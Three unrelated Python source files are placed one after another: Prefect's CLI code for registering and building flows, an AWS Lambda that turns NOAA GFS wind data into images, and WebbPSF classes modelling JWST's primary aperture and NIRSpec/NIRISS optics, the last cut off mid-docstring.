""" sources = [Source(p, "script") for p in paths] sources.extend(Source(m, "module") for m in modules) sources.extend(Source(m, "json") for m in json_paths) out = {} for s in sources: try: if s.kind == "module": flows = load_flows_from_module(s.location) elif s.kind == "json": flows = load_flows_from_json(s.location) else: flows = load_flows_from_script(s.location) except TerminalError: # If we're running with --watch, bad files are logged and skipped # rather than aborting early if not in_watch: raise out[s] = flows # Filter flows by name if requested if names: names = set(names) out = { source: [f for f in flows if f.name in names] for source, flows in out.items() } missing = names.difference(f.name for flows in out.values() for f in flows) if missing: missing_flows = "\n".join(f"- {n}" for n in sorted(missing)) click.secho( f"Failed to find the following flows:\n{missing_flows}", fg="red" ) if not in_watch: raise TerminalError # Drop empty sources out = {source: flows for source, flows in out.items() if flows} return out def prepare_flows(flows: "List[FlowLike]", labels: List[str] = None) -> None: """Finish preparing flows. Shared code between `register` and `build` for any flow modifications required before building the flow's storage. Modifies the flows in-place. """ labels = set(labels or ()) # Finish setting up all flows before building, to ensure a stable hash # for flows sharing storage instances for flow in flows: if isinstance(flow, dict): # Add any extra labels to the flow new_labels = set(flow["run_config"].get("labels") or []).union(labels) flow["run_config"]["labels"] = sorted(new_labels) else: # Set the default flow result if not specified if not flow.result: flow.result = flow.storage.result # Add a `run_config` if not configured explicitly if flow.run_config is None: flow.run_config = UniversalRun() # Add any extra labels to the flow (either specified via the CLI, # or from the storage object). flow.run_config.labels.update(labels) flow.run_config.labels.update(flow.storage.labels) # Add the flow to storage flow.storage.add_flow(flow) def get_project_id(client: "prefect.Client", project: str) -> str: """Get a project id given a project name. Args: - project (str): the project name Returns: - str: the project id """ resp = client.graphql( {"query": {with_args("project", {"where": {"name": {"_eq": project}}}): {"id"}}} ) if resp.data.project: return resp.data.project[0].id else: raise TerminalError(f"Project {project!r} does not exist") def register_serialized_flow( client: "prefect.Client", serialized_flow: dict, project_id: str, force: bool = False, schedule: bool = True, ) -> Tuple[str, int, bool]: """Register a pre-serialized flow. Args: - client (prefect.Client): the prefect client - serialized_flow (dict): the serialized flow - project_id (str): the project id - force (bool, optional): If `False` (default), an idempotency key will be generated to avoid unnecessary re-registration. Set to `True` to force re-registration. - schedule (bool, optional): If `True` (default) activates the flow schedule upon registering. Returns: - flow_id (str): the flow id - flow_version (int): the flow version - is_new (bool): True if this is a new flow version, false if re-registration was skipped. """ # Get most recent flow id for this flow. 
This can be removed once # the registration graphql routes return more information flow_name = serialized_flow["name"] resp = client.graphql( { "query": { with_args( "flow", { "where": { "_and": { "name": {"_eq": flow_name}, "project": {"id": {"_eq": project_id}}, } }, "order_by": {"version": EnumValue("desc")}, "limit": 1, }, ): {"id", "version"} } } ) if resp.data.flow: prev_id = resp.data.flow[0].id prev_version = resp.data.flow[0].version else: prev_id = None prev_version = 0 inputs = dict( project_id=project_id, serialized_flow=compress(serialized_flow), set_schedule_active=schedule, ) if not force: inputs["idempotency_key"] = hashlib.sha256( json.dumps(serialized_flow, sort_keys=True).encode() ).hexdigest() res = client.graphql( { "mutation($input: create_flow_from_compressed_string_input!)": { "create_flow_from_compressed_string(input: $input)": {"id"} } }, variables=dict(input=inputs), retry_on_api_error=False, ) new_id = res.data.create_flow_from_compressed_string.id if new_id == prev_id: return new_id, prev_version, False else: return new_id, prev_version + 1, True def build_and_register( client: "prefect.Client", flows: "List[FlowLike]", project_id: str, labels: List[str] = None, force: bool = False, schedule: bool = True, ) -> Counter: """Build and register all flows. Args: - client (prefect.Client): the prefect client to use - flows (List[FlowLike]): the flows to register - project_id (str): the project id in which to register the flows - labels (List[str], optional): Any extra labels to set on all flows - force (bool, optional): If false (default), an idempotency key will be used to avoid unnecessary register calls. - schedule (bool, optional): If `True` (default) activates the flow schedule upon registering. Returns: - Counter: stats about the number of successful, failed, and skipped flows. """ # Finish preparing flows to ensure a stable hash later prepare_flows(flows, labels) # Group flows by storage instance. storage_to_flows = defaultdict(list) for flow in flows: storage = flow.storage if isinstance(flow, prefect.Flow) else None storage_to_flows[storage].append(flow) # Register each flow, building storage as needed. # Stats on success/fail/skip rates are kept for later display stats = Counter(registered=0, errored=0, skipped=0) for storage, flows in storage_to_flows.items(): # Build storage if needed if storage is not None: click.echo(f" Building `{type(storage).__name__}` storage...") try: storage.build() except Exception as exc: click.secho(" Error building storage:", fg="red") log_exception(exc, indent=6) red_error = click.style("Error", fg="red") for flow in flows: click.echo(f" Registering {flow.name!r}... 
{red_error}") stats["errored"] += 1 continue for flow in flows: click.echo(f" Registering {flow.name!r}...", nl=False) try: if isinstance(flow, box.Box): serialized_flow = flow else: serialized_flow = flow.serialize(build=False) flow_id, flow_version, is_new = register_serialized_flow( client=client, serialized_flow=serialized_flow, project_id=project_id, force=force, schedule=schedule, ) except Exception as exc: click.secho(" Error", fg="red") log_exception(exc, indent=4) stats["errored"] += 1 else: if is_new: click.secho(" Done", fg="green") click.echo(f" └── ID: {flow_id}") click.echo(f" └── Version: {flow_version}") stats["registered"] += 1 else: click.secho(" Skipped (metadata unchanged)", fg="yellow") stats["skipped"] += 1 return stats def register_internal( project: str, paths: List[str], modules: List[str], json_paths: List[str] = None, names: List[str] = None, labels: List[str] = None, force: bool = False, schedule: bool = True, in_watch: bool = False, ) -> None: """Do a single registration pass, loading, building, and registering the requested flows. Args: - project (str): the project in which to register the flows. - paths (List[str]): a list of file paths containing flows. - modules (List[str]): a list of python modules containing flows. - json_paths (List[str]): a list of file paths containing serialied flows produced by `prefect build`. - names (List[str], optional): a list of flow names that should be registered. If not provided, all flows found will be registered. - labels (List[str], optional): a list of extra labels to set on all flows. - force (bool, optional): If false (default), an idempotency key will be used to avoid unnecessary register calls. - schedule (bool, optional): If `True` (default) activates the flow schedule upon registering. - in_watch (bool, optional): Whether this call resulted from a `register --watch` call. """ client = prefect.Client() # Determine the project id project_id = get_project_id(client, project) # Load flows from all files/modules requested click.echo("Collecting flows...") source_to_flows = collect_flows( paths, modules, json_paths, names=names, in_watch=in_watch ) # Iterate through each file, building all storage and registering all flows # Log errors as they happen, but only exit once all files have been processed stats = Counter(registered=0, errored=0, skipped=0) for source, flows in source_to_flows.items(): click.echo(f"Processing {source.location!r}:") stats += build_and_register( client, flows, project_id, labels=labels, force=force, schedule=schedule ) # Output summary message registered = stats["registered"] skipped = stats["skipped"] errored = stats["errored"] parts = [click.style(f"{registered} registered", fg="green")] if skipped: parts.append(click.style(f"{skipped} skipped", fg="yellow")) if errored: parts.append(click.style(f"{errored} errored", fg="red")) msg = ", ".join(parts) bar_length = max(60 - len(click.unstyle(msg)), 4) // 2 bar = "=" * bar_length click.echo(f"{bar} {msg} {bar}") # If not in a watch call, exit with appropriate exit code if not in_watch and stats["errored"]: raise TerminalError def watch_for_changes( paths: List[str] = None, modules: List[str] = None, period: float = 0.5, ) -> "Iterator[Tuple[List[str], List[str]]]": """Watch a list of paths and modules for changes. Yields tuples of `(paths, modules)` whenever changes are detected, where `paths` is a list of paths that changed and `modules` is a list of modules that changed. 
""" paths = list(paths or ()) modules = list(modules or ()) for path in paths: if not os.path.exists(path): raise TerminalError(f"Path {path!r} doesn't exist") if modules: # If modules are provided, we need to convert these to paths to watch. # There's no way in Python to do this without possibly importing the # defining module. As such, we run the command in a temporary process # pool. with multiprocessing.get_context("spawn").Pool(1) as pool: module_paths = pool.apply(get_module_paths, (modules,)) path_to_module = dict(zip(module_paths, modules)) else: path_to_module = {} tracked = paths + list(path_to_module) cache = dict.fromkeys(path_to_module) while True: cache2 = {} for path in tracked: try: try: with os.scandir(path) as directory: for entry in directory: if entry.is_file() and entry.path.endswith(".py"): old_mtime = cache.get(entry.path) mtime = entry.stat().st_mtime if mtime != old_mtime: cache2[entry.path] = mtime except NotADirectoryError: old_mtime = cache.get(path) mtime = os.stat(path).st_mtime if mtime != old_mtime: cache2[path] = mtime except FileNotFoundError: cache.pop(path, None) if cache2: change_paths = [] change_mods = [] for path in cache2: module = path_to_module.get(path) if module is not None: change_mods.append(module) else: change_paths.append(path) if change_paths or change_mods: yield change_paths, change_mods cache.update(cache2) time.sleep(period) REGISTER_EPILOG = """ \bExamples: \b Register all flows found in a directory. \b $ prefect register --project my-project -p myflows/ \b Register a flow named "example" found in `flow.py`. \b $ prefect register --project my-project -p flow.py -n "example" \b Register all flows found in a module named `myproject.flows`. \b $ prefect register --project my-project -m "myproject.flows" \b Register a flow in variable `flow_x` in a module `myproject.flows`. \b $ prefect register --project my-project -m "myproject.flows.flow_x" \b Register all pre-built flows from a remote JSON file. \b $ prefect register --project my-project --json https://some-url/flows.json \b Register all flows in python files found recursively using globbing \b $ prefect register --project my-project --path "**/*" \b Watch a directory of flows for changes, and re-register flows upon change. \b $ prefect register --project my-project -p myflows/ --watch \b Register a flow found in `flow.py` and disable its schedule. \b $ prefect register --project my-project -p flow.py --no-schedule """ @click.group(invoke_without_command=True, epilog=REGISTER_EPILOG) @click.option( "--project", help="The name of the Prefect project to register this flow in. Required.", default=None, ) @click.option( "--path", "-p", "paths", help=( "A path to a file or a directory containing the flow(s) to register. " "May be passed multiple times to specify multiple paths." ), multiple=True, ) @click.option( "--module", "-m", "modules", help=( "A python module name containing the flow(s) to register. May be the full " "import path to a flow. May be passed multiple times to specify multiple " "modules. " ), multiple=True, ) @click.option( "--json", "-j", "json_paths", help=( "A path or URL to a JSON file created by `prefect build` containing the flow(s) " "to register. May be passed multiple times to specify multiple paths. " "Note that this path may be a remote url (e.g. https://some-url/flows.json)." ), multiple=True, ) @click.option( "--name", "-n", "names", help=( "The name of a flow to register from the specified paths/modules. 
If " "provided, only flows with a matching name will be registered. May be " "passed multiple times to specify multiple flows. If not provided, all " "flows found on all paths/modules will be registered." ), multiple=True, ) @click.option( "--label", "-l", "labels", help=( "A label to add on all registered flow(s). May be passed multiple " "times to specify multiple labels." ), multiple=True, ) @click.option( "--force", "-f", help="Force flow registration, even if the flow's metadata is unchanged.", default=False, is_flag=True, ) @click.option( "--watch", help=( "If set, the specified paths and modules will be monitored and " "registration re-run upon changes." ), default=False, is_flag=True, ) @click.option( "--schedule/--no-schedule", help=( "Toggles the flow schedule upon registering. By default, the " "flow's schedule will be activated and future runs will be created. " "If disabled, the schedule will still be attached to the flow but " "no runs will be created until it is activated." ), default=True, ) @handle_terminal_error def register( project, paths, modules, json_paths, names, labels, force, watch, schedule ): """Register one or more flows into a project. Flows with unchanged metadata will be skipped as registering again will only change the version number. """ if project is None: raise ClickException("Missing required option '--project'") paths = expand_paths(paths) if watch: if any(parse_path(j).scheme != "file" for j in json_paths): raise ClickException("--watch is not supported for remote paths") json_paths = set(json_paths) ctx = multiprocessing.get_context("spawn") for change_paths_temp, change_mods in watch_for_changes( paths=paths, modules=modules ): change_paths = [] change_json_paths = [] for p in change_paths_temp: if p in json_paths: change_json_paths.append(p) else: change_paths.append(p) proc = ctx.Process( target=register_internal, name="prefect-register", args=(project,), kwargs=dict( paths=change_paths, modules=change_mods, json_paths=change_json_paths, names=names, labels=labels, force=force, in_watch=True, schedule=schedule, ), daemon=True, ) proc.start() proc.join() else: modules = list(modules or ()) register_internal( project, paths, modules, json_paths, names, labels, force, schedule ) BUILD_EPILOG = """ \bExamples: \b Build all flows found in a directory. \b $ prefect build -p myflows/ \b Build a flow named "example" found in `flow.py`. \b $ prefect build -p flow.py -n "example" \b Build all flows found in a module named `myproject.flows`. \b $ prefect build -m "myproject.flows" \b Build all flows in python files named `flow.py` found recursively using globbing \b $ prefect register --project my-project -p "**/flow.py" """ @click.command(epilog=BUILD_EPILOG) @click.option( "--path", "-p", "paths", help=( "A path to a file or a directory containing the flow(s) to build. " "May be passed multiple times to specify multiple paths." ), multiple=True, ) @click.option( "--module", "-m", "modules", help=( "A python module name containing the flow(s) to build. May be " "passed multiple times to specify multiple modules." ), multiple=True, ) @click.option( "--name", "-n", "names", help=( "The name of a flow to build from the specified paths/modules. If " "provided, only flows with a matching name will be built. May be " "passed multiple times to specify multiple flows. If not provided, " "all flows found on all paths/modules will be built." ), multiple=True, ) @click.option( "--label", "-l", "labels", help=( "A label to add on all built flow(s). 
May be passed multiple " "times to specify multiple labels." ), multiple=True, ) @click.option( "--output", "-o", default="flows.json", help="The output path. Defaults to `flows.json`.", ) @click.option( "--update", "-u", is_flag=True, default=False, help="Updates an existing `json` file rather than overwriting it.", ) @handle_terminal_error def build(paths, modules, names, labels, output, update): """Build one or more flows. This command builds all specified flows and writes their metadata to a JSON file. These flows can then be registered without building later by passing the `--json` flag to `prefect register`. """ succeeded = 0 errored = 0 # If updating, load all previously written flows first if update and os.path.exists(output): serialized_flows = {f["name"]: f for f in load_flows_from_json(output)} else: serialized_flows = {} # Collect flows from specified paths & modules paths = expand_paths(list(paths or ())) modules = list(modules or ()) click.echo("Collecting flows...") source_to_flows = collect_flows(paths, modules, [], names=names) for source, flows in source_to_flows.items(): click.echo(f"Processing {source.location!r}:") # Finish preparing flows to ensure a stable hash later prepare_flows(flows, labels) # Group flows by storage instance. storage_to_flows = defaultdict(list) for flow in flows: storage_to_flows[flow.storage].append(flow) for storage, flows in storage_to_flows.items(): # Build storage click.echo(f" Building `{type(storage).__name__}` storage...") try: storage.build() except Exception as exc: click.secho(" Error building storage:", fg="red") log_exception(exc, indent=6) red_error = click.style("Error", fg="red") for flow in flows: click.echo(f" Building {flow.name!r}... {red_error}") errored += 1 continue # Serialize flows for flow in flows: click.echo(f" Building {flow.name!r}...", nl=False) try: serialized_flows[flow.name] = flow.serialize(build=False) except Exception as exc: click.secho(" Error", fg="red") log_exception(exc, indent=4) errored += 1 else: click.secho(" Done", fg="green") succeeded += 1 # Write output file click.echo(f"Writing output to {output!r}") flows = [serialized_flows[name] for name in sorted(serialized_flows)] obj = {"version": 1, "flows": flows} with open(output, "w") as fil: json.dump(obj, fil, sort_keys=True) # Output summary message parts = [click.style(f"{succeeded} built", fg="green")] if errored: parts.append(click.style(f"{errored} errored", fg="red")) msg = ", ".join(parts) bar_length = max(60 - len(click.unstyle(msg)), 4) // 2 bar = "=" * bar_length click.echo(f"{bar} {msg} {bar}") # Exit with appropriate status code if errored: raise TerminalError
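# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the CLI above): `register_serialized_flow`
# avoids unnecessary re-registration by sending an idempotency key that is
# simply the sha256 hex digest of the sort-keyed JSON serialization, so the
# key is stable while the flow's metadata is unchanged. The payload below is
# a hypothetical stand-in for a real serialized flow.
# ---------------------------------------------------------------------------
import hashlib
import json

serialized_flow_example = {"name": "example-flow", "tasks": [], "schedule": None}
idempotency_key = hashlib.sha256(
    json.dumps(serialized_flow_example, sort_keys=True).encode()
).hexdigest()
print(idempotency_key)  # identical across runs until the payload changes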
import boto3
import rasterio
import os
import numpy as np
from osgeo import gdal
from botocore.handlers import disable_signing
from typing import List
from datetime import datetime

DATASET_TMP_PATH = "/tmp/tmp.grib2"
GDAL_TMP_FILE = "/tmp/temp.tiff"
FINAL_IMG = "/tmp/final.jpeg"

NOAA_BUCKET = 'noaa-gfs-bdp-pds'
PROCESSED_BUCKET_AP = 'arn:aws:s3:eu-west-1:168000702421:accesspoint/noaa-processing'

if ('CDK_NOAA_BUCKET_ID' in os.environ):
    NOAA_BUCKET = os.environ['CDK_NOAA_BUCKET_ID']
if ('CDK_PROCESSED_BUCKET_AP' in os.environ):
    PROCESSED_BUCKET_AP = os.environ['CDK_PROCESSED_BUCKET_AP']


def get_file_s3_unsigned(bucket: str, key: str, file_path: str, TEST_ENV=False) -> None:
    s3 = boto3.resource('s3')
    gfs_res = s3.Bucket(bucket)
    # Enable unsigned s3 requests only while not testing
    # as mocking them is difficult.
    if (not TEST_ENV):
        gfs_res.meta.client.meta.events.register('choose-signer.s3.*', disable_signing)
    gfs_res.download_file(key, file_path)


def put_file_s3(bucket: str, key: str, file_path: str) -> None:
    s3 = boto3.resource('s3')
    s3.Bucket(bucket).upload_file(file_path, key)


# Processes the dataset and returns a status dict that contains the dataset's
# valid timestamp as a string.
def process_dataset(file_in: str, file_out: str, tmp_file: str, mode: str) -> dict:
    ds = gdal.Open(file_in)
    ds_time = datetime.utcfromtimestamp(
        int(ds.GetRasterBand(1).GetMetadataItem('GRIB_VALID_TIME').replace("sec UTC", ""))
    )
    valid_timestring = ds_time.strftime('%Y-%m-%dT%H:%M:%S')

    # if ds_time is more than 12 hours in the future, discard it
    # this should be parsed directly from the filename, but this works out too
    if (ds_time - datetime.utcnow()).total_seconds() > 12 * 60 * 60:
        return {
            "status": "noop",
            "valid_timestring": valid_timestring,
        }

    ugrd = "UGRD"
    vgrd = "VGRD"
    bands = None
    if (mode == "wind"):
        bands = [
            {  # U component of wind (m/s)
                "GRIB_ELEMENT": ugrd,
                "GRIB_SHORT_NAME": "10-HTGL"
            },
            {  # V component of wind (m/s)
                "GRIB_ELEMENT": vgrd,
                "GRIB_SHORT_NAME": "10-HTGL"
            },
        ]

    band_indexes = {}
    for i in range(1, ds.RasterCount + 1):
        band = ds.GetRasterBand(i)
        grib_element = band.GetMetadata()['GRIB_ELEMENT']
        grib_short_name = band.GetMetadata()['GRIB_SHORT_NAME']
        for (band_idx, band_dict) in enumerate(bands):
            if (grib_element == band_dict['GRIB_ELEMENT'] and grib_short_name == band_dict['GRIB_SHORT_NAME']):
                band_indexes[grib_element] = i
                break

    in_srs = "+proj=longlat +datum=WGS84 +lon_wrap=180"
    out_srs = "EPSG:3857"
    band_indexes_keys = band_indexes.values()

    # pick the bands we want from grib file
    translated = gdal.Translate("", ds, bandList=band_indexes_keys, format="VRT")
    # reproject to epsg:3857 and cut to sensible bounds (taken manually from qgis osm layer)
    bounds = [-20037508.3427892439067364, -20037508.3427892550826073, 20037508.3427892439067364, 20037508.3427892439067364]
    # write reprojected file to tmp file so we can pick bands we want with rasterio
    warped = gdal.Warp(tmp_file, translated, dstNodata=9999, srcSRS=in_srs, dstSRS=out_srs,
                       outputBounds=bounds, creationOptions=["COMPRESS=LZW"])
    # write dataset to disk
    del warped
    del translated
    # only 512mb of disk space is available for lambda, so deletion here might be necessary
    # os.unlink(file_in)

    with rasterio.open(tmp_file) as src:
        # rasterio's .shape is (rows, cols), i.e. (height, width)
        with rasterio.open(file_out, "w", width=src.shape[1], height=src.shape[0], count=3, dtype='uint8') as dst:
            if (mode == "wind"):
                # enumerate() is 0-based while rasterio bands are 1-indexed, hence the +1
                u_index = [index for index, value in enumerate(band_indexes) if value == ugrd][0] + 1
                v_index = [index for index, value in enumerate(band_indexes) if value == vgrd][0] + 1
                u_raw = src.read(u_index)
                v_raw = src.read(v_index)
                u_rescaled = np.interp(u_raw, (-50, 50), (0, 255)).astype(np.uint8)
                v_rescaled = np.interp(v_raw, (-50, 50), (0, 255)).astype(np.uint8)
                # In a sense this band three is completely redundant, but WebGL lookup from a picture
                # like this was easier, so keeping it this way for now.
                speed = np.sqrt(src.read(u_index)**2 + src.read(v_index)**2).astype(np.uint8)
                dst.write(u_rescaled, 1)
                dst.write(v_rescaled, 2)
                dst.write(speed, 3)
            else:
                print("Mode not supported")

    return {
        "status": "update",
        "valid_timestring": valid_timestring,
    }


def delete_files_if_exists(files: List[str]) -> None:
    for f in files:
        if os.path.exists(f):
            os.unlink(f)


def key_is_fresh_enough(key: str) -> bool:
    # gfs.20210226/18/gfs.t18z.sfluxgrbf010.grib2
    hours = int(key.split("sfluxgrbf")[1].split(".")[0])
    return hours < 24


def handle_new_gfs(key: str):
    if not key_is_fresh_enough(key):
        print("Hour more than 24h in the future, skipping " + key)
        return

    # If we get the same execution context as from a previous lambda invocation,
    # we might have unnecessary files there filling up the 512M limit on /tmp.
    delete_files_if_exists([DATASET_TMP_PATH, GDAL_TMP_FILE, FINAL_IMG])
    get_file_s3_unsigned(NOAA_BUCKET, key, DATASET_TMP_PATH)
    for mode in ["wind"]:
        result = process_dataset(DATASET_TMP_PATH, FINAL_IMG, GDAL_TMP_FILE, mode)
        if (result["status"] == "update"):
            output_key = f'{result["valid_timestring"]}_noaa_{mode}.jpeg'
            put_file_s3(PROCESSED_BUCKET_AP, output_key, FINAL_IMG)
        else:
            print("Not updating, too far in the future")
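# ---------------------------------------------------------------------------
# Illustrative sketch (separate from the lambda above): `process_dataset`
# packs the wind components into 8-bit image channels by linearly mapping
# m/s values in [-50, 50] onto [0, 255] with np.interp. A few hypothetical
# sample values show what that mapping produces:
# ---------------------------------------------------------------------------
import numpy as np

u_sample = np.array([-50.0, -10.0, 0.0, 50.0])  # wind speeds in m/s (made up)
u_packed = np.interp(u_sample, (-50, 50), (0, 255)).astype(np.uint8)
print(u_packed)  # -> [  0 102 127 255]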
import os import poppy import poppy.utils import numpy as np import matplotlib import matplotlib.pyplot as plt from astropy.table import Table import astropy.io.fits as fits import astropy.units as units from scipy.interpolate import griddata, RegularGridInterpolator from scipy.ndimage import rotate from . import utils from . import constants import logging _log = logging.getLogger('webbpsf') import pysiaf ####### Classes for modeling aspects of JWST's segmented active primary ##### def segment_zernike_basis(segnum=1, nterms=15, npix=512, outside=np.nan): """ Basis set in the style of poppy.zernike.zernike_basis for segment-level Zernike polynomials for one segment at a time in JWST's aperture. Parameters ------------ segnum : integer 1 to 18, number of JWST segment. Uses same numbering convention as the WSS. nterms : integer Number of Zernike polynomial terms to return npix : integer Number of pixels per side of the array outside : float Value to fill the array with outside of the valid segment. """ from .webbpsf_core import segname aper = WebbPrimaryAperture(label_segments=True) w = poppy.Wavefront( npix=npix, diam=constants.JWST_CIRCUMSCRIBED_DIAMETER ) segmask = aper.get_transmission(w) segname = segname(segnum) cenx, ceny = aper.seg_centers[segname] # nominal point to point diam for A and B segments; # ignoring slight departures from ideal hexes for now. seg_radius = constants.JWST_SEGMENT_RADIUS y, x = w.coordinates() r = np.sqrt((y - ceny) ** 2 + (x - cenx) ** 2) / seg_radius theta = np.arctan2((y - ceny) / seg_radius, (x - cenx) / seg_radius) r[segmask != segnum] = np.nan theta[segmask != segnum] = np.nan wg = np.where(segmask == segnum) outzerns = np.full((nterms, npix, npix), outside, dtype=float) outzerns_tmp = poppy.zernike.zernike_basis( nterms=nterms, rho=r[wg], theta=theta[wg], outside=outside ) for iz in range(nterms): outzerns[iz][wg] = outzerns_tmp[iz] return outzerns class WebbPrimaryAperture(poppy.AnalyticOpticalElement): """ The JWST telescope primary mirror geometry, in all its hexagonal obscured complexity. Note this has **just the aperture shape** and not any wavefront error terms. JWST design pupil geometry and segment coordinates taken from Paul Lightsey's spreadsheet: "2010.03.16 Transmission X Area Budget.xls". That document was in turn based on Ball Aerospace drawing 2220169 Rev B, and the OTE Cryogenic Optics ICD, BATC doc # C327693. This class has no wavefront errors, it's just the pupil geometry including the segments (which are not quite perfect hexagons for manufacturing reasons related to trying to tile a curved surface with hexagons while maintaining uniform clearance between adjacent segments) and the secondary mirror support struts, including the bumps on the +V3 strut for the mid boom hinge and mag dampers. .. warning:: At high sampling factors, PSF calculations become a LOT slower. By default, this produces an aperture with values 0 and 1 for the transmission. By setting the parameter label_segments=True, you can instead have it generate a map of which segment number is in which location. 
""" def __init__(self, name="WebbPrimaryAperture", label_segments=False, **kwargs): super(WebbPrimaryAperture, self).__init__(name=name, **kwargs) self.label_segments = label_segments self.segdata = constants.JWST_PRIMARY_SEGMENTS self.strutdata = constants.JWST_PRIMARY_STRUTS self.seg_centers = dict(constants.JWST_PRIMARY_SEGMENT_CENTERS) def get_transmission(self, wave): segpaths = {} strutpaths = [] for segname, vertices in self.segdata: segpaths[segname] = matplotlib.path.Path(vertices) for strutname, vertices in self.strutdata: strutpaths.append(matplotlib.path.Path(vertices)) y, x = wave.coordinates() pts = np.asarray([a for a in zip(x.flat, y.flat)]) npix = wave.shape[0] out = np.zeros((npix, npix)) # paint the segments 1 but leave out the SMSS struts for segname, p in segpaths.items(): res = p.contains_points(pts) res.shape = (npix, npix) out[res] = 1 if not self.label_segments else int(segname.split('-')[1]) for p in strutpaths: res = p.contains_points(pts) res.shape = (npix, npix) out[res] = 0 return out # Note - the following is **NOT USED YET ** # This will be finished up and used in a subsequent release to # apply the OTE field dependence. For now just the fixed per SI stuff # is there. class WebbOTEPupil(poppy.FITSOpticalElement): """The complex OTE pupil, including: 1) the aperture geometry, based on the cryo ICD detailed coordinates 2) high spatial frequency WFE from the as-built mirrors in Rev G optical model 3) mid frequencies from Rev W optical budget 4) low frequency field-dependent WFE from the Rev G optical model. Parameters ----------- level : ' """ def __init__(self, instrument=None, level='requirements', opd_index=0, **kwargs): if instrument is not None: self.instrument = instrument self.instr_name = instrument.name self.tel_coords = instrument._tel_coords() else: self.instrument = None self.instr_name = "NIRCam" # TODO figure out default V2V3 coords here self.tel_coords = (0, 0) # ? TODO # determine filename for pupil amplitude array aperture_file = 'jwst_pupil_revW_npix1024.fits.gz' aperture_file = os.path.abspath(os.path.join( utils.get_webbpsf_data_path(), aperture_file )) # determine filename for the OPD array # This should contain a precomputed combination of # Rev G high spatial frequencies and # Rev W mid spatial frequencies # Depends on what the 'level' parameter is. if level == 'perfect': opd_file = os.path.join( utils.get_webbpsf_data_path(), 'OPD_jwst_ote_perfectly_aligned.fits' ) elif level in ('predicted', 'requirements'): opd_file = os.path.join( utils.get_webbpsf_data_path(), self.instr_name, 'OPD', 'OPD_RevW_ote_for_{}_{}.fits'.format(self.instr_name, level) ) else: raise ValueError("Invalid/unknown wavefront error level") super(WebbOTEPupil, self).__init__(name='JWST Primary', transmission=aperture_file, opd=opd_file, **kwargs) if self.instrument is not None: # we need a field point to be able to use this so # just skip it if we don't have one. # determine Zernike coeffs for field dependent error # based on Rev G field dependence model. coeffs = np.zeros(22) self.zernike_coeffs = coeffs # TODO apply that to as a modification to the OPD array. ####### Custom Optics used in JWInstrument classes ##### class NIRSpec_three_MSA_shutters(poppy.AnalyticOpticalElement): """ Three NIRSpec MSA shutters, adjacent vertically.""" def get_transmission(self, wave): """ Compute the transmission inside/outside of the field stop. 
The area of an open shutter is 0.2 x 0.45, while the shutter pitch is 0.26x0.51 The walls separating adjacent shutters are 0.06 arcsec wide. """ msa_width = 0.2 msa_height = 0.45 msa_wall = 0.06 if not isinstance(wave, poppy.Wavefront): raise ValueError("get_transmission must be called with a Wavefront to define the spacing") assert (wave.planetype == poppy.poppy_core._IMAGE) y, x = wave.coordinates() self.transmission = np.zeros(wave.shape) # get the innermost shutter than spans the Y axis w_inside_1 = np.where((abs(y) < (msa_height / 2)) & (abs(x) < (msa_width / 2))) self.transmission[w_inside_1] = 1 # get the adjacent shutters one above and one below. w_inside_2 = np.where((abs(y) > (msa_height / 2) + msa_wall) & (abs(y) < msa_height * 1.5 + msa_wall) & (abs(x) < (msa_width / 2))) self.transmission[w_inside_2] = 1 return self.transmission class NIRSpec_MSA_open_grid(poppy.AnalyticOpticalElement): """ An infinite repeating region of the NIRSpec MSA grid""" def get_transmission(self, wave): """ Compute the transmission inside/outside of the field stop. The area of an open shutter is 0.2 x 0.45, while the shutter pitch is 0.26x0.51 The walls separating adjacent shutters are 0.06 arcsec wide. """ msa_width = 0.2 msa_height = 0.45 msa_wall = 0.06 msa_x_pitch = 0.26 msa_y_pitch = 0.51 if not isinstance(wave, poppy.Wavefront): raise ValueError("get_transmission must be called with a Wavefront to define the spacing") assert (wave.planetype == poppy.poppy_core._IMAGE) y, x = wave.coordinates() # xnew = x*np.cos(np.deg2rad(self.angle)) + y*np.sin(np.deg2rad(self.angle)) # ynew = -x*np.sin(np.deg2rad(self.angle)) + y*np.cos(np.deg2rad(self.angle)) # x,y = xnew, ynew mask_vert_walls = np.abs(np.mod(np.abs(x), msa_x_pitch) - (msa_x_pitch / 2)) < msa_wall / 2 mask_horz_walls = np.abs(np.mod(np.abs(y), msa_y_pitch) - (msa_y_pitch / 2)) < msa_wall / 2 self.transmission = np.ones(wave.shape) self.transmission[mask_vert_walls] = 0 self.transmission[mask_horz_walls] = 0 return self.transmission class NIRISS_GR700XD_Grism(poppy.AnalyticOpticalElement): """ Custom optic class to model the NIRISS SOSS grim GR700XD This includes both the pupil mask file and the cylindrical lens Based on inputs from Loic Albert, Anand Sivaramakrishnan, and Andre Martel In particular see FGS_TFI_UdM_035_RevD for details of the NIRISS GR700XD measurement, and JWST-STScI-003338 for detector orientation and layout. GRISM DESIGN: The grism (and cylinder) are per design rotated by 2 degrees so as to be able to sample an emission line across different pixel position along the spatial direction (kind of resampling the line and not be limited by intra pixel response). From Loic Albert's NIRISS technical report: * surface sag for the cylinder: 3.994 micron peak * limited to 3.968 microns for the 26 mm FOV mask From Loic Albert's email to Marshall 2013-07-18: I do have an update concerning the geometry of the GR700XD pupil mask. It turns out that they clocked the grism by about 2.25 degrees wrt the OTE system of coordinates. However, the field mask did not follow and is still aligned along the OTE s.o.c. That was a mistake that fortunately does have much impact. Comdev is in the process of modelling a new mask for the Spare grism. Remember that we will swap the current FLight GR700XD for its Spare which offers much improved performances. The mask size will be a little different (rectangular) and this time will be clocked 2.25 degrees along with the grism. 
The sign of the rotation of the grism will have to be devised by trying the 2 possibilities an looking at the resulting tilt of the monochromatic PSF and the position of that PSF on the detector. Attached is a simulation of what we expect based on my own PSF generator. The cylinder lens has a well characterized power (actually radius of curvature). The values are: current Flight: 22.85 meters Spare: 22.39 meters Prism physical size: pupil is 26 mm on a side for the current prism, will be 28 mm for the spare From Loic Albert's email to Marshall 2013-09-19: The latest news on this front are: 1 - The current Flight mask is attached. It is 26x26 mm. The mask and grism are *not* aligned along the same coordinates. That was a mistake. I'll forward you a message from Michael M., our optics expert at CSA. 2 - The Spare mask (likely the one which will fly) is not built yet. The mask will be aligned along the grism coordinate and both will be clocked 2.2 deg wrt the OTE. 3 - A ghost analysis showed that the current grism clocking will suffer from large ghosts. So we are studying how to clock the Spare grism in its cell to minimize ghosts. Likely a 90 degrees rotation will be applied to baseline of point 2. From Michael.Maszkiewicz@asc-csa.gc.ca: As far as I understand now, we have two rotations in the as-built GR700. One rotation is for the 